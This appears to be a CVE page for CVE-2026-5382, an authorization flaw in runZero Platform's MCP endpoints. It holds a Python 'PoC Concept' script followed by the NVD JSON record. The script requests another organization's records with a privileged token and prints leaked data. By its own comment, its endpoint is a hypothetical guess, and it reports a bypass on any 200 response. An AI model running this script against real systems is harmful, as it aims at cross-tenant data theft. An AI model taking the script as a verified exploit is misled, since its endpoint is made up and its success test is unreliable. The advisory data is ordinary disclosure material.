CVE-2026-5382

# PoC Concept for CVE-2026-5382 # Description: Exploits Incorrect Authorization to access records outside authorized scope via MCP endpoint. # Requirements: High privileged token, Network access to target. import requests def exploit_poc(target_url, auth_token, target_org_id): """ Attempts to retrieve records from an unauthorized organization scope. """ headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json", "Accept": "application/json" } # Malicious payload targeting a specific organization ID outside user scope # Endpoint structure is hypothetical based on MCP description endpoint = f"{target_url}/api/v1/mcp/records" payload = { "scope": "organization", "org_id": target_org_id, # The unauthorized target organization ID "query": "*" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] PoC Successful: Authorized access bypassed.") print(f"[+] Leaked Data Preview: {response.text[:200]}") return True else: print(f"[-] PoC Failed: Received status code {response.status_code}") return False except Exception as e: print(f"[!] Error during exploit: {str(e)}") return False if __name__ == "__main__": # Example usage target = "https://runzero-target.com" token = "<HIGH_PRIVILEGE_TOKEN>" rogue_org_id = "target_org_uuid_12345" exploit_poc(target, token, rogue_org_id)

{"cve": {"id": "CVE-2026-5382", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-04-07T15:17:48.390", "lastModified": "2026-04-21T15:37:26.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue that could expose records outside of the authorized organization scope through the MCP endpoints has been resolved. This is an instance of CWE-863: Incorrect Authorization, and has an estimated CVSS score of \nCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N (3.0 Low). This issue was fixed in version 4.0.260206.0 of the runZero Platform."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:runzero:runzero_platform:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.260206.0", "matchCriteriaId": "B38AA8F8-701F-4D7B-892A-A1183B095A32"}]}]}], "references": [{"url": "https://help.runzero.com/docs/release-notes/#402602060", "source": "44488dab-36db-4358-99f9-bc116477f914", "tags": ["Release Notes"]}, {"url": "https://www.runzero.com/advisories/runzero-platform-mcp-infoleak-cve-2026-5382/", "source": "44488dab-36db-4358-99f9-bc116477f914", "tags": ["Vendor Advisory"]}]}}